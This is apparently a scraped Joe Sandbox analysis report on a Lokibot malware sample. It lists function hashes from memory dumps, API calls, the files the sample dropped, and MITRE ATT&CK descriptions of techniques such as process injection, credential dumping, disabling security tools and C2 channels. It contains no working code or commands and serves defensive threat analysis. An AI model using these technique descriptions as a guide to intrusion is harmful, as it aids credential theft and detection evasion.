Snapshot File: hcaresult_9_2_28d0000_aWBoUwiux.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1c3f27b4038e900736b8068c93eb85ed08825eca574dc895505ffbf07f5fbffb
Instruction ID: 0569f2d55b968001e97ed21b6a0e7273c8ae64382293ed136ada2d4fe575cef3
Opcode Fuzzy Hash: 1c3f27b4038e900736b8068c93eb85ed08825eca574dc895505ffbf07f5fbffb
Instruction Fuzzy Hash: D921E2B5D00249AFDB10CFAAD984ADEBBF8FB48310F14801AE918A3310D374A954CFA1

Function 028DB678 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028DB6DE

Memory Dump Source

Source File: 00000009.00000002.2502840522.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_28d0000_aWBoUwiux.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 19cb1b5abf27211c360658ec763713f72a1350690d05498246b7774577d0b8c4
Instruction ID: eba2e6db93ddaf55ada66a47c61b1ca4d5822bd8e0e997eacc2d4eca4bc1ae85
Opcode Fuzzy Hash: 19cb1b5abf27211c360658ec763713f72a1350690d05498246b7774577d0b8c4
Instruction Fuzzy Hash: 331110B9C002498FCB10CF9AD444BDEFBF4EF88314F11842AD429A7210C375A549CFA1

Function 00EED3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2502411672.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_eed000_aWBoUwiux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac2bccc0709eb7ecf6150f1d5125e7ed42bc7ce3bc78000aa80c71fbaa4e548d
Instruction ID: 1e5482d5d358fef12658db2d37dab34dd03b2f2fb5b597806a4ef02d8ebf03a1
Opcode Fuzzy Hash: ac2bccc0709eb7ecf6150f1d5125e7ed42bc7ce3bc78000aa80c71fbaa4e548d
Instruction Fuzzy Hash: 372148B1508288DFDB01DF04DDC0B16BFA5FBA4324F24C569E8095B286C336E816C6A2

Function 00EFD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2502465089.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_efd000_aWBoUwiux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ad2288f5a85c2327e85754d491782b9530a0ca32696561050fe99560042733
Instruction ID: 1a1bb907352e6463d3d4d940fb7641a4a115e18b3205e6612040b4539ea73810
Opcode Fuzzy Hash: 31ad2288f5a85c2327e85754d491782b9530a0ca32696561050fe99560042733
Instruction Fuzzy Hash: 0921F571608248DFDB15DF14D9C4B26BF67EB84318F34C56DDA0A5B286CB36D807CA61

Function 00EFD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2502465089.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_efd000_aWBoUwiux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d5955f15c1281bd931c5527189ce42df5a97bf22f3e1d38c36c98ac251dd9a
Instruction ID: 8b4720502dc8d329ffc3f1b38e67fa9de5f09bc9d2fa1ab34c5c5e74572146f9
Opcode Fuzzy Hash: a2d5955f15c1281bd931c5527189ce42df5a97bf22f3e1d38c36c98ac251dd9a
Instruction Fuzzy Hash: C32107B1508208EFEB05DF54D9C0B36BFA6FB84318F34C56DDA095B265C336D816CAA1

Function 00EFD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2502465089.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_efd000_aWBoUwiux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9684c13a045828098d57016339ba91ac0b41d3b69b94d00840714903c0794644
Instruction ID: 9219bcfc13b5de86a9864f2cea992b57c100747cbad30d6c04eb5b4de9586119
Opcode Fuzzy Hash: 9684c13a045828098d57016339ba91ac0b41d3b69b94d00840714903c0794644
Instruction Fuzzy Hash: C721807550D3848FDB02CF24D994715BF72EB46314F28C5EAD9498B6A7C33A980ACB62

Function 00EED3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2502411672.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_eed000_aWBoUwiux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction ID: 734fedb63789cff96bcb30af2bbe655d5b7caa8c9c0d21dad79cda216046ff66
Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction Fuzzy Hash: 65112676404284CFCB12CF00D9C4B16BF71FBA4324F24C2A9D8090B656C33AE85ACBA1

Function 00EFD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2502465089.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_efd000_aWBoUwiux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction ID: 6252b60aa5ee5487738412d88ab598e940bdd188d196644265f5f7e4dbd3be67
Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction Fuzzy Hash: 8F11BE75508244DFDB02CF50D9C4B25BF62FB84318F24C6AAD9494B666C33AD81ACB91

Function 00EED745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2502411672.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_eed000_aWBoUwiux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b3bc5e34248b33baea97004f30af2a318e784254f06c66208452cb45640e176
Instruction ID: 6673e8735f7133f3e40a3b4ba732ee9f25387ec1f0f9cb4e009e5ca6494d0e40
Opcode Fuzzy Hash: 7b3bc5e34248b33baea97004f30af2a318e784254f06c66208452cb45640e176
Instruction Fuzzy Hash: 6C012B7100C3889AE7104F26CDC4B67BF98DF41324F28C51BFD091A286D3399840CA71

Function 00EED744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2502411672.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_eed000_aWBoUwiux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32c1d2be0b552a8093d372898d74f2307c0f655b58d87836b300660df5021219
Instruction ID: ab21f031ed8c070a731619c9ca0e1714f0630063145e35d1f36ab5725c1bc724
Opcode Fuzzy Hash: 32c1d2be0b552a8093d372898d74f2307c0f655b58d87836b300660df5021219
Instruction Fuzzy Hash: C2F062714083849EE7108F16DD88B62FF98EB51734F18C55BFD485A296C3799844CAB1

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LEmJJ87mUQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_aWBoUwiux.exe_8f1cdd7b3dbfff1ec2f4d9a68fbfa3e125112d5_25cd11fa_8875c584-d939-4445-a0c3-bdbed31d5e23\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB83E.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA81.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBAD0.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LEmJJ87mUQ.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_behydvpn.pj1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgrzduey.s3v.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szt4u3pv.t5n.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vo0awnwi.hsz.ps1

C:\Users\user\AppData\Local\Temp\tmp33C7.tmp

C:\Users\user\AppData\Local\Temp\tmpE3D.tmp

Windows Analysis Report
LEmJJ87mUQ.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre